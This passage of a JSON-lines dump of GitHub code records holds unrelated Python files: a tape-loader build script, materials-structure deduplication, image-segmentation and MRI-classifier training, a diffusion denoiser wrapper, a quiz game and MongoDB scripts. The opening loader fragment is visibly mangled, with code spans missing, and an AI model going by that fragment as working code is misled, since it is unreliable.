labelList['COUNT_STATES']\n\n\"\"\"\nPayload\n\"\"\"\n# Note that baud rate is set in two places:\n# Below (for mastering) and near the bottom of boot2.asm (playback)\n#\npayload = Versaload(baud=baud)\n\n\"\"\"\nBorder functions\n\nThese alter the code of 
the loader to change the border colour effects during\nloading.\n\"\"\"\ndef borderFlash(colour):\n # Change colour of loading border flash\n payload.load(borderFlashAddr,pack(\" 0:\n countTime(bits)\n bits -= 80+40 # Allowance for countdown block\n payload.load(addr,data[0:0x100])\n\n # Adjust parameters for next time around\n bits -= 80 # Allowance for data header\n bits -= 8*len(data[0:0x100])\n addr += len(data[0:0x100])\n data = data[0x100:]\n return bits\n\n# Original is 6ae1 long, 0x5dc0 to c8a1\n# Load 0x5dc0..0xbc00\npayloadBits = loadWithCountdown(0x5dc0, mainData[0x0000:0x5e40],payloadBits)\nif len(mainData) > 0x5e40:\n # Load 0xbc00..0xc000 to 0xd000+\n payloadBits = loadWithCountdown(0xd000, mainData[0x5e40:0x6240],payloadBits)\nif len(mainData) > 0x6240:\n payloadBits = loadWithCountdown(0xc000, mainData[0x6240:],payloadBits)\npayload.load(0xb493, pack(\" List[int]:\n\n # if required, do the preprocessing for all the structures before. no scaling.\n if primitive:\n for i, s in enumerate(structures):\n spga = SpacegroupAnalyzer(s)\n structures[i] = spga.find_primitive()\n\n sm = StructureMatcher(primitive_cell=False, stol=stol, scale=False)\n\n duplicated_data = []\n unique_structures = {}\n for i_test, s_test in enumerate(structures):\n\n for i_ref, s_ref in unique_structures.items():\n # if len(s_test) != len(s_ref):\n # continue\n # access private method since this will save some time in avoiding the\n # preprocessing.\n match = sm._match(s_test, s_ref, 1, True, break_on_match=True)\n if match is not None and match[0] <= sm.stol:\n duplicated_data.append(i_ref)\n break\n else:\n unique_structures[i_test] = s_test\n duplicated_data.append(None)\n\n return duplicated_data\n\n\ndef group_data(data: List[Dict], energy_tol: float = 0.03) -> List[List[Dict]]:\n sorted_data = sorted(data, key=lambda d: (d[\"nsites\"], d[\"n_inequivalent_sites\"], d[\"energy_per_atom\"]))\n key_func = lambda d: (d[\"nsites\"], d[\"n_inequivalent_sites\"], (d[\"energy_per_atom\"] // energy_tol) * energy_tol)\n grouped_data = []\n for _, group in itertools.groupby(sorted_data, key=key_func):\n grouped_data.append(list(group))\n\n return grouped_data\n\n\ndef run_deduplicate(data: List[Dict], connection_data: dict, stol: float = 0.03, primitive: bool = True,\n delete: bool = False):\n\n duplicated = deduplicate_list([Structure.from_dict(d[\"structure\"]) for d in data], stol=stol, primitive=primitive)\n\n mongo_store = MongoStore(**connection_data)\n mongo_store.connect()\n\n if delete:\n ids_to_remove = [d[\"_id\"] for d, dupl in zip(data, duplicated) if dupl is not None]\n mongo_store.remove_docs({\"_id\": {\"$in\": ids_to_remove}})\n else:\n for d, dupl in zip(data, duplicated):\n if dupl is not None:\n mongo_store.collection.update({\"_id\": d[\"_id\"]},{\"$set\": {\"duplicated\": data[dupl][\"structure_id\"]}})\n\n\ndef deduplicate_data_paral(n_procs: int, connection_data: dict, delete: bool = False,\n stol: float = 0.03, primitive: bool = True, energy_tol: float = 0.03):\n \"\"\"\n A function that marks the duplicated structures inside a mongodb collection.\n First looks for all the structures that do not have the \"duplicated\" value set (absent or None).\n Groups the data based on number of atoms and range of energies. 
For each of these sublists it runs a comparison\n    with the StructureMatcher, chooses one of the structures as the reference and, for the other equivalent\n    structures, sets a \"duplicated\" attribute in the document whose value is the structure_id of the reference\n    structure.\n\n    The energy ranges are determined by energy_tol and simply split the energy into bins.\n    As a consequence some structures may be reported as inequivalent even if they would match.\n    This should not be a big issue.\n    Args:\n        n_procs: number of processes used in parallel.\n        connection_data: a dictionary with the data that should be given to instantiate a MongoStore.\n        delete: if True the duplicated data will be deleted instead of marked as duplicated.\n        stol: the stol parameter passed to the StructureMatcher\n        primitive: if True the match will be done after converting to primitive.\n        energy_tol: the width of the bin used to divide the structures based on their energy per atom.\n    \"\"\"\n    mongo_store = MongoStore(**connection_data)\n    mongo_store.connect()\n\n    fields = [\"structure\", \"energy_per_atom\", \"nsites\", \"n_inequivalent_sites\", \"structure_id\"]\n    r = mongo_store.query({\"duplicated\": None}, properties=fields)\n    if not r:\n        return\n    data = list(r)\n\n    grouped_data = group_data(data, energy_tol=energy_tol)\n\n    func = partial(run_deduplicate, connection_data=connection_data, stol=stol, primitive=primitive,\n                   delete=delete)\n\n    pool = multiprocessing.Pool(n_procs)\n    pool.map(func, grouped_data)\n    pool.close()\n","repo_name":"modl-uclouvain/randomcarbon","sub_path":"randomcarbon/output/deduplicate.py","file_name":"deduplicate.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71853357228","text":"\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import ModelCheckpoint, CSVLogger, ReduceLROnPlateau, EarlyStopping, TensorBoard\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.metrics import Recall, Precision, MeanIoU\nfrom glob import glob\nfrom sklearn.model_selection import train_test_split\nfrom model import NanoNet_A, NanoNet_B, NanoNet_C\nfrom utils import shuffling, create_dir\nfrom metrics import dice_loss, dice_coef, iou, bce_dice_loss\nfrom data import tf_dataset, load_data\n\nif __name__ == \"__main__\":\n    \"\"\" Seeding \"\"\"\n    np.random.seed(42)\n    tf.random.set_seed(42)\n\n    \"\"\" Remove folders and files \"\"\"\n    # os.system(\"rm files/files.csv\")\n    # os.system(\"rm -r logs\")\n\n    \"\"\" Hyperparameters \"\"\"\n    input_shape = (256, 256, 3)\n    batch_size = 8\n    lr = 1e-4\n    epochs = 200\n    model_name = \"A\"\n    model_path = f\"files/{model_name}/model.h5\"\n    csv_path = f\"files/{model_name}/model.csv\"\n    log_path = f\"logs/{model_name}/\"\n\n    \"\"\" Creating folders \"\"\"\n    create_dir(f\"files/{model_name}\")\n\n    \"\"\" Dataset \"\"\"\n    path = \"/../../Dataset/Kvasir-SEG/\"\n    (train_x, train_y), (valid_x, valid_y) = load_data(path)\n\n    train_dataset = tf_dataset(train_x, train_y, batch=batch_size)\n    valid_dataset = tf_dataset(valid_x, valid_y, batch=batch_size)\n\n    \"\"\" Model \"\"\"\n    if model_name == \"A\":\n        model = NanoNet_A(input_shape)\n    elif model_name == \"B\":\n        model = NanoNet_B(input_shape)\n    elif model_name == \"C\":\n        model = NanoNet_C(input_shape)\n\n    metrics = [dice_coef, iou, Recall(), Precision()]\n    model.compile(loss=dice_loss, optimizer=Adam(lr), metrics=metrics)\n    model.summary()\n\n    
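\"\"\" Callbacks \"\"\"\n    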
callbacks = [\n ModelCheckpoint(model_path, verbose=1, save_best_only=True),\n ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, min_lr=1e-7, verbose=1),\n CSVLogger(csv_path),\n TensorBoard(log_dir=log_path),\n EarlyStopping(monitor='val_loss', patience=20, restore_best_weights=False),\n ]\n\n train_steps = (len(train_x)//batch_size)\n valid_steps = (len(valid_x)//batch_size)\n\n if len(train_x) % batch_size != 0:\n train_steps += 1\n\n if len(valid_x) % batch_size != 0:\n valid_steps += 1\n\n model.fit(train_dataset,\n epochs=epochs,\n validation_data=valid_dataset,\n steps_per_epoch=train_steps,\n validation_steps=valid_steps,\n callbacks=callbacks,\n shuffle=False)\n","repo_name":"DebeshJha/NanoNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"39361633111","text":"from torch import nn\nfrom k_diffusion import utils as k_utils\nimport torch\nfrom k_diffusion.external import CompVisDenoiser\nfrom torchvision.utils import make_grid\nfrom IPython import display\nfrom torchvision.transforms.functional import to_pil_image\n\nclass CFGDenoiser(nn.Module):\n def __init__(self, model):\n super().__init__()\n self.inner_model = model\n\n def forward(self, x, sigma, uncond, cond, cond_scale):\n x_in = torch.cat([x] * 2)\n sigma_in = torch.cat([sigma] * 2)\n cond_in = torch.cat([uncond, cond])\n uncond, cond = self.inner_model(x_in, sigma_in, cond=cond_in).chunk(2)\n return uncond + (cond - uncond) * cond_scale\n\nclass CFGDenoiserWithGrad(CompVisDenoiser):\n def __init__(self, model, \n loss_fns_scales, # List of [cond_function, scale] pairs\n clamp_func=None, # Gradient clamping function, clamp_func(grad, sigma)\n gradient_wrt=None, # Calculate gradient with respect to [\"x\", \"x0_pred\", \"both\"]\n gradient_add_to=None, # Add gradient to [\"cond\", \"uncond\", \"both\"]\n cond_uncond_sync=True, # Calculates the cond and uncond simultaneously\n decode_method=None, # Function used to decode the latent during gradient calculation\n grad_inject_timing_fn=None, # Option to use grad in only a few of the steps\n grad_consolidate_fn=None, # Function to add grad to image fn(img, grad, sigma)\n verbose=False):\n super().__init__(model.inner_model)\n self.inner_model = model\n self.cond_uncond_sync = cond_uncond_sync \n\n # Initialize gradient calculation variables\n self.clamp_func = clamp_func\n self.gradient_add_to = gradient_add_to\n if gradient_wrt is None:\n self.gradient_wrt = 'x'\n self.gradient_wrt = gradient_wrt\n if decode_method is None:\n decode_fn = lambda x: x\n elif decode_method == \"autoencoder\":\n decode_fn = model.inner_model.differentiable_decode_first_stage\n elif decode_method == \"linear\":\n decode_fn = model.inner_model.linear_decode\n self.decode_fn = decode_fn\n\n # Parse loss function-scale pairs\n cond_fns = []\n for loss_fn,scale in loss_fns_scales:\n if scale != 0:\n cond_fn = self.make_cond_fn(loss_fn, scale)\n else:\n cond_fn = None\n cond_fns += [cond_fn]\n self.cond_fns = cond_fns\n\n if grad_inject_timing_fn is None:\n self.grad_inject_timing_fn = lambda sigma: True\n else:\n self.grad_inject_timing_fn = grad_inject_timing_fn\n if grad_consolidate_fn is None:\n self.grad_consolidate_fn = lambda img, grad, sigma: img + grad * sigma\n else:\n self.grad_consolidate_fn = grad_consolidate_fn\n\n self.verbose = verbose\n self.verbose_print = print if self.verbose else lambda *args, **kwargs: None\n\n\n # 
General denoising model with gradient conditioning\n def cond_model_fn_(self, x, sigma, inner_model=None, **kwargs):\n\n # inner_model: optionally use a different inner_model function or a wrapper function around inner_model, see self.forward._cfg_model\n if inner_model is None:\n inner_model = self.inner_model\n\n total_cond_grad = torch.zeros_like(x)\n for cond_fn in self.cond_fns:\n if cond_fn is None: continue\n\n # Gradient with respect to x\n if self.gradient_wrt == 'x':\n with torch.enable_grad():\n x = x.detach().requires_grad_()\n denoised = inner_model(x, sigma, **kwargs)\n cond_grad = cond_fn(x, sigma, denoised=denoised, **kwargs).detach()\n\n # Gradient wrt x0_pred, so save some compute: don't record grad until after denoised is calculated\n elif self.gradient_wrt == 'x0_pred':\n with torch.no_grad():\n denoised = inner_model(x, sigma, **kwargs)\n with torch.enable_grad():\n cond_grad = cond_fn(x, sigma, denoised=denoised.detach().requires_grad_(), **kwargs).detach()\n total_cond_grad += cond_grad\n\n total_cond_grad = torch.nan_to_num(total_cond_grad, nan=0.0, posinf=float('inf'), neginf=-float('inf'))\n\n # Clamp the gradient\n total_cond_grad = self.clamp_grad_verbose(total_cond_grad, sigma)\n\n # Add gradient to the image\n if self.gradient_wrt == 'x':\n x.copy_(self.grad_consolidate_fn(x.detach(), total_cond_grad, k_utils.append_dims(sigma, x.ndim)))\n cond_denoised = inner_model(x, sigma, **kwargs)\n elif self.gradient_wrt == 'x0_pred':\n x.copy_(self.grad_consolidate_fn(x.detach(), total_cond_grad, k_utils.append_dims(sigma, x.ndim)))\n cond_denoised = self.grad_consolidate_fn(denoised.detach(), total_cond_grad, k_utils.append_dims(sigma, x.ndim))\n\n return cond_denoised\n\n def forward(self, x, sigma, uncond, cond, cond_scale):\n\n def _cfg_model(x, sigma, cond, **kwargs):\n # Wrapper to add denoised cond and uncond as in a cfg model\n # input \"cond\" is both cond and uncond weights: torch.cat([uncond, cond])\n x_in = torch.cat([x] * 2)\n sigma_in = torch.cat([sigma] * 2)\n\n denoised = self.inner_model(x_in, sigma_in, cond=cond, **kwargs)\n uncond_x0, cond_x0 = denoised.chunk(2)\n x0_pred = uncond_x0 + (cond_x0 - uncond_x0) * cond_scale\n return x0_pred\n\n # Conditioning\n if self.check_conditioning_schedule(sigma):\n # Apply the conditioning gradient to the completed denoised (after both cond and uncond are combined into the diffused image)\n if self.cond_uncond_sync:\n # x0 = self.cfg_cond_model_fn_(x, sigma, uncond=uncond, cond=cond, cond_scale=cond_scale)\n cond_in = torch.cat([uncond, cond])\n x0 = self.cond_model_fn_(x, sigma, cond=cond_in, inner_model=_cfg_model)\n\n # Calculate cond and uncond separately\n else:\n if self.gradient_add_to == \"uncond\":\n uncond = self.cond_model_fn_(x, sigma, cond=uncond)\n cond = self.inner_model(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n elif self.gradient_add_to == \"cond\":\n uncond = self.inner_model(x, sigma, cond=uncond)\n cond = self.cond_model_fn_(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n elif self.gradient_add_to == \"both\":\n uncond = self.cond_model_fn_(x, sigma, cond=uncond)\n cond = self.cond_model_fn_(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n else: \n raise Exception(f\"Unrecognised option for gradient_add_to: {self.gradient_add_to}\")\n\n # No conditioning\n else:\n # calculate cond and uncond simultaneously\n if self.cond_uncond_sync:\n cond_in = torch.cat([uncond, cond])\n x0 = _cfg_model(x, sigma, cond=cond_in)\n else:\n uncond = 
self.inner_model(x, sigma, cond=uncond)\n cond = self.inner_model(x, sigma, cond=cond)\n x0 = uncond + (cond - uncond) * cond_scale\n\n return x0\n\n def make_cond_fn(self, loss_fn, scale):\n # Turns a loss function into a cond function that is applied to the decoded RGB sample\n # loss_fn (function): func(x, sigma, denoised) -> number\n # scale (number): how much this loss is applied to the image\n\n # Cond function with respect to x\n def cond_fn(x, sigma, denoised, **kwargs):\n with torch.enable_grad():\n denoised_sample = self.decode_fn(denoised).requires_grad_()\n loss = loss_fn(denoised_sample, sigma, **kwargs) * scale\n grad = -torch.autograd.grad(loss, x)[0]\n self.verbose_print('Loss:', loss.item())\n return grad\n\n # Cond function with respect to x0_pred\n def cond_fn_pred(x, sigma, denoised, **kwargs):\n with torch.enable_grad():\n denoised_sample = self.decode_fn(denoised).requires_grad_()\n loss = loss_fn(denoised_sample, sigma, **kwargs) * scale\n grad = -torch.autograd.grad(loss, denoised)[0]\n self.verbose_print('Loss:', loss.item())\n return grad\n\n if self.gradient_wrt == 'x':\n return cond_fn\n elif self.gradient_wrt == 'x0_pred':\n return cond_fn_pred\n else:\n raise Exception(f\"Variable gradient_wrt == {self.gradient_wrt} not recognised.\")\n\n def clamp_grad_verbose(self, grad, sigma):\n if self.clamp_func is not None:\n if self.verbose:\n print(\"Grad before clamping:\")\n self.display_samples(torch.abs(grad*2.0) - 1.0)\n grad = self.clamp_func(grad, sigma)\n if self.verbose:\n print(\"Conditioning gradient\")\n self.display_samples(torch.abs(grad*2.0) - 1.0)\n return grad\n\n def check_conditioning_schedule(self, sigma):\n is_conditioning_step = False\n\n if (self.cond_fns is not None and \n any(cond_fn is not None for cond_fn in self.cond_fns)):\n # Conditioning strength != 0\n # Check if this is a conditioning step\n if self.grad_inject_timing_fn(sigma):\n is_conditioning_step = True\n\n if self.verbose:\n print(f\"Conditioning step for sigma={sigma}\")\n\n return is_conditioning_step\n\n def display_samples(self, images):\n images = images.double().cpu().add(1).div(2).clamp(0, 1)\n images = torch.tensor(images.numpy())\n grid = make_grid(images, 4).cpu()\n display.display(to_pil_image(grid))\n return\n","repo_name":"deforum-art/deforum-stable-diffusion","sub_path":"helpers/model_wrap.py","file_name":"model_wrap.py","file_ext":"py","file_size_in_byte":10172,"program_lang":"python","lang":"en","doc_type":"code","stars":1974,"dataset":"github-code","pt":"37"} +{"seq_id":"4473879699","text":"elementInRowCount = 0\nrows = 7\ncacheNumber = 1\nstartingNumber = 1\nfor number in range(1,50):\n print(cacheNumber, end = \" \")\n elementInRowCount += 1\n cacheNumber = cacheNumber + rows\n if elementInRowCount == rows:\n print()\n elementInRowCount = 0\n startingNumber += 1\n cacheNumber = startingNumber","repo_name":"JakubIwaszek/PythonHomeworks","sub_path":"03ControlStructures/e32.py","file_name":"e32.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31395800577","text":"import pdb\nfrom uuid import uuid4 as gen_uuid\n\nfrom .. 
import Inferencer\nfrom ...rdf_wrapper import *\nfrom rdflib import URIRef\nfrom ...helpers import bidict\n\nclass DummyQuiver(Inferencer):\n\n def __init__(self,\n target_building,\n target_srcids,\n source_buildings=[],\n ui=None,\n config={}):\n if 'ground_truth_ttl' not in config:\n raise Exception('True Turtle file should be given for DummyQuiver')\n self.true_g = self.new_graph()\n self.true_g.parse(config['ground_truth_ttl'], format='turtle')\n super(DummyQuiver, self).__init__(\n target_building=target_building,\n target_srcids=target_srcids,\n ui=ui,\n config=config,\n framework_name='quiver')\n self.cache_vav_dict(self.true_g)\n\n def cache_vav_dict(self, true_g):\n qstr = \"\"\"\n select ?point ?srcid ?vav where {\n ?vav a brick:vav.\n ?point bf:isPointOf ?vav .\n ?point bf:srcid ?srcid.\n }\n \"\"\"\n res = query_sparql(true_g, qstr)\n self.point_vav_dict = bidict()\n for row in res:\n vav = row['vav']\n point_srcid = row['srcid']\n point = create_uri(point_srcid)\n self.point_vav_dict[point] = vav\n\n def predict_cached(self, target_srcids=[]):\n pred_g = self.new_graph(empty=True)\n #colocated_points = {}\n occs = self.get_occs()\n for occ in occs:\n print(\"Found it\")\n if self.prior_g and self.prior_confidences\\\n [(URIRef(str(occ)), RDF.type, BRICK.occupied_command)] < 0.5:\n continue\n vav = self.point_vav_dict[URIRef(str(occ))]\n insert_triple(pred_g, (vav, RDF['type'], BRICK['vav']))\n points = self.point_vav_dict.inverse[vav]\n for point in points:\n insert_triple(pred_g, (point, BF['isPointOf'], vav))\n self.pred_g = pred_g\n return self.pred_g\n\n def predict(self, target_srcids=[]):\n return self.predict_cached(target_srcids)\n\n def get_occs(self):\n if self.prior_g:\n qstr = \"\"\"\n select ?occ where {\n ?occ a brick:occupied_command.\n }\n \"\"\"\n res = query_sparql(self.prior_g, qstr)\n occs = [row['occ'] for row in res]\n else:\n qstr = \"\"\"\n select ?srcid where {\n ?occ a brick:occupied_command.\n ?occ bf:srcid ?srcid.\n }\n \"\"\"\n res = query_sparql(self.true_g, qstr)\n srcids = [row['srcid'] for row in res]\n occs = [create_uri(srcid) for srcid in srcids]\n return occs\n\n def predict_raw(self, target_srcids=[]):\n pred_g = self.new_graph(empty=True)\n if self.target_building == 'ebu3b':\n qstr = \"\"\"\n select ?occ ?occ_srcid ?point ?point_srcid where {\n ?occ a brick:occupied_command.\n ?occ bf:srcid ?occ_srcid .\n ?occ bf:isPointOf ?something .\n ?point bf:isPointOf ?something .\n ?point bf:srcid ?point_srcid .\n ?occ bf:isPointOf ?something .\n }\n \"\"\"\n else:\n raise Exception('qstr should be rewritten for {0}'\n .format(self.target_building))\n # TODO: Add confidences (==1)\n res = query_sparql(self.true_g, qstr)\n vav_dict = {}\n #for\n # random_obj = create_uri(str(gen_uuid())) # This would be a VAV.\n for row in res:\n occ_srcid = str(row['occ_srcid'])\n if occ_srcid not in vav_dict:\n vav_dict[occ_srcid] = create_uri(str(gen_uuid())) # This would be a VAV.\n vav = vav_dict[occ_srcid]\n occ = create_uri(occ_srcid)\n point = create_uri(str(row['point_srcid']))\n insert_triple(pred_g, (point, BF['isPointOf'], vav))\n insert_triple(pred_g, (occ, BF['isPointOf'], vav))\n insert_triple(pred_g, (vav, RDF['type'], BRICK['vav']))\n self.pred_g = pred_g\n return pred_g\n\n def predict_dep(self, target_srcids=[]):\n pred_g = self.new_graph(empty=True)\n occs = self.get_occs()\n for occ in occs:\n if self.target_building == 'ebu3b':\n srcid = occ.split('#')[-1]\n qstr = \"\"\"\n select ?point where {{\n ?occ bf:srcid \"{0}\" .\n ?occ bf:isPointOf 
?something .\n ?point bf:isPointOf ?something .\n ?point a/rdfs:subClassOf* brick:point .\n }}\n \"\"\".format(srcid)\n else:\n qstr = \"\"\"\n select ?point where {{\n {0} bf:isPointOf ?something .\n ?point bf:isPointOf ?something .\n ?point a/rdfs:subClassOf* brick:point .\n }}\n \"\"\".format(occ.n3())\n res = query_sparql(self.true_g, qstr)\n points = [row['point'] for row in res]\n random_obj = create_uri(str(gen_uuid())) # This would be a VAV.\n for point in points:\n insert_triple(pred_g, (point, BF['isPointOf'], random_obj))\n insert_triple(pred_g, (random_obj, RDF['type'], BRICK['VAV']))\n\n pred_g.serialize('test.ttl', format='turtle')\n self.pred_g = pred_g\n print('Quiver done')\n return pred_g\n\nclass DummyPritoni(Inferencer):\n\n def __init__(self,\n ground_truth_ttl,\n target_building,\n target_srcids,\n source_buildings=[],\n ui=None,\n config={}):\n self.true_g = self.new_graph()\n self.true_g.parse(ground_truth_ttl, format='turtle')\n super(DummyPritoni, self).__init__(\n target_building=target_building,\n target_srcids=target_srcids,\n ui=ui,\n config=config,\n framework_name='quiver')\n\n def get_ahu_datsp(self): #discharge air temperature setpoint\n qstr = \"\"\"\n select ?datsp ?ahu where {\n ?datsp a/rdfs:subClassOf* brick:Discharge_Air_Temperature_Setpoint.\n ?datsp bf:isPointOf ?ahu.\n ?ahu a brick:AHU.\n }\n \"\"\"\n res = query_sparql(self.prior_g, qstr)\n return [\n {\n 'datsp': row['datsp'],\n 'ahu': row['ahu']\n } for row in res\n ]\n\n def get_all_vavs_with_znt(self):\n qstr = \"\"\"\n select ?vav where {\n ?vav a/rdfs:subClassOf* brick:VAV .\n ?znt bf:isPointOf ?vav.\n ?znt a brick:Zone_Temperature_Sensor.\n }\n \"\"\"\n res = query_sparql(self.prior_g + self.schema_g, qstr)\n return [row['vav'] for row in res]\n\n def predict(self):\n pred_g = self.new_graph(True)\n ahu_datsps = self.get_ahu_datsp()\n found_vavs = self.get_all_vavs_with_znt()\n\n for row in ahu_datsps:\n ahu = row['ahu']\n datsp = row['datsp']\n qstr = \"\"\"\n select ?vav where {{\n {0} bf:feeds+ ?vav.\n ?vav a/rdfs:subClassOf* brick:VAV.\n }}\n \"\"\".format(ahu.n3())\n res = query_sparql(self.true_g, qstr)\n true_vavs = [row['vav'] for row in res]\n pred_vavs = [vav for vav in true_vavs if vav in found_vavs]\n for vav in pred_vavs:\n insert_triple(pred_g, (ahu, BF['feeds'], vav))\n\n return pred_g\n\n","repo_name":"plastering/plastering","sub_path":"plastering/inferencers/quiver/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"25442182222","text":"# Day 17 project - Quiz\n\nimport random\nfrom time import sleep\nfrom art import logo, end_logo\n\nfrom unicodedata import name\nfrom os import system,name\n\n# define our clear function\ndef clear():\n # for windows\n if name == 'nt':\n _ = system('cls')\n\nclass QuizBrain:\n def __init__(self,q_list):\n self.question_number = 0\n self.question_list = q_list\n self.score = 0\n self.total = len(q_list)\n \n def still_has_questions(self):\n return self.question_number < len(self.question_list)\n \n def next_question(self):\n current_question = random.choice(self.question_list)\n self.question_number += 1\n choice = input(f\"Q{self.question_number}. {current_question.text}? 
('True'/'False') : \")\n self.check_answer(choice,current_question)\n \n def check_answer(self,choice,current_question):\n if choice == current_question.answer:\n self.score += 1\n print(\"You got this right!\")\n print(f\"Your score is {self.score}\")\n self.question_list.remove(current_question)\n \n else:\n print(f\"The correct answer is: {current_question.answer}\")\n print(\"Sorry you got this wrong!\")\n sleep(1)\n clear()\n print(f\"{logo}\\n\")\n print(f\"Your final score is {self.score}/{self.total}\\n\")\n print(f\"{end_logo}\")\n exit()","repo_name":"Amar1709/100Days_Python","sub_path":"Day_17/quiz_brain.py","file_name":"quiz_brain.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8417780221","text":"import os\nfrom pathlib import Path\nfrom glob import glob\nimport imutils\nimport cv2\n\nTUMOR_TYPES = ['glioma_tumor', 'meningioma_tumor', 'no_tumor', 'pituitary_tumor']\n\n\ndef show_image(image):\n cv2.imshow(\"Image\", image)\n cv2.waitKey(0)\n\n\ndef get_cropped_coords(image):\n image = cv2.GaussianBlur(image, (5, 5), 0)\n\n thresh = cv2.threshold(image, 10, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.erode(thresh, None, iterations=2)\n thresh = cv2.dilate(thresh, None, iterations=2)\n\n contours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(contours)\n brain_contour = max(contours, key=cv2.contourArea)\n\n x_min = tuple(brain_contour[brain_contour[:, :, 0].argmin()][0])[0]\n x_max = tuple(brain_contour[brain_contour[:, :, 0].argmax()][0])[0]\n y_min = tuple(brain_contour[brain_contour[:, :, 1].argmin()][0])[1]\n y_max = tuple(brain_contour[brain_contour[:, :, 1].argmax()][0])[1]\n\n return x_min, y_min, x_max, y_max\n\n\ndef create_folders_if_not_exist(out_path):\n directory = os.sep.join(out_path.split(os.sep)[:-1])\n Path(directory).mkdir(parents=True, exist_ok=True)\n\n\ndef read_image(image_path):\n image = cv2.imread(image_path)\n return cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\ndef store_image(cropped_image, image_path):\n out_path = image_path.replace(f\"..{os.sep}\", \"\")\n create_folders_if_not_exist(out_path)\n cv2.imwrite(out_path, cropped_image)\n\n\ndef crop_contours(mode):\n assert mode in ['Training', 'Testing']\n\n for tumor_type in TUMOR_TYPES:\n image_paths = glob(f\"..{os.sep}dataset{os.sep}{mode}{os.sep}{tumor_type}{os.sep}*\")\n for image_path in image_paths:\n image = read_image(image_path)\n x_min, y_min, x_max, y_max = get_cropped_coords(image)\n cropped_image = image[y_min:y_max, x_min:x_max]\n store_image(cropped_image, image_path)\n\n\ndef main():\n crop_contours('Training')\n crop_contours('Testing')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SoroushMehraban/Brain-Tumor-Classification","sub_path":"preprocessing/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"35951097777","text":"import os\nimport tensorflow as tf\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\n\n\ndef train(train_generator, validation_generator):\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(128, (3, 3), activation='relu', input_shape=(150, 150, 1)),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(256, (3, 3), 
activation='relu'),\n        tf.keras.layers.MaxPooling2D(2, 2),\n        tf.keras.layers.Conv2D(512, (3, 3), activation='relu'),\n        tf.keras.layers.MaxPooling2D(2, 2),\n        tf.keras.layers.Flatten(),\n        tf.keras.layers.Dense(128, activation='relu'),\n        tf.keras.layers.Dense(1, activation='sigmoid')\n    ])\n\n    model.compile(optimizer=RMSprop(lr=0.001), loss='binary_crossentropy', metrics=['accuracy'])\n\n    history = model.fit(train_generator,\n                        epochs=50,\n                        verbose=1,\n                        validation_data=validation_generator)\n    return history\n\n\ndef plot_train_test(history):\n    acc = history.history['acc']\n    val_acc = history.history['val_acc']\n    loss = history.history['loss']\n    val_loss = history.history['val_loss']\n\n    epochs = range(len(acc))\n\n    plt.plot(epochs, acc, 'r', \"Training Accuracy\")\n    plt.plot(epochs, val_acc, 'b', \"Validation Accuracy\")\n    plt.title('Training and validation accuracy')\n    plt.figure()\n\n    plt.plot(epochs, loss, 'r', \"Training Loss\")\n    plt.plot(epochs, val_loss, 'b', \"Validation Loss\")\n    plt.figure()\n\n\nTRAINING_DIR = \"./training\"\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255.,\n                                   rotation_range=40,\n                                   zoom_range=0.2,\n                                   horizontal_flip=True,\n                                   fill_mode='nearest')\ntrain_generator = train_datagen.flow_from_directory(TRAINING_DIR,\n                                                    batch_size=4,\n                                                    class_mode='binary',\n                                                    target_size=(150, 150))\n\nVALIDATION_DIR = \"./testing\"\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255.)\nvalidation_generator = validation_datagen.flow_from_directory(VALIDATION_DIR,\n                                                               batch_size=4,\n                                                               class_mode='binary',\n                                                               target_size=(150, 150))\n\nif __name__ == '__main__':\n    history = train(train_generator, validation_generator)\n    plot_train_test(history)\n","repo_name":"mushcatshiro/data-science","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17310656539","text":"from base import *\nfrom life import *\nimport time\nfrom urllib2 import urlopen\n\n\n\n# You Can Change Below\n\nexchange = 'SHFE'\n\nsymbol = 'IF'\n\n# You Can't Change Below!!!\n\n\n\nnames = 'raw_%s_%s_run'%(exchange,symbol)\n\n_plus = 'rebuild'\n_old = 'k_%s_%s_%s'%(exchange,symbol,_plus)\n\nTimeStamp = 0*24*3600*21\ndb = conn[names]['raw']\nn = 100\ncnt = 0\nconn.drop_database(_old)\nwhile(n>=100):\n\trs = list(db.find({},sort=[('time',asc)],limit=n,skip=cnt*n))\n\tn = len(rs)\n\tprint(n*cnt)\n\tfor one in rs:\n\t\tpp = 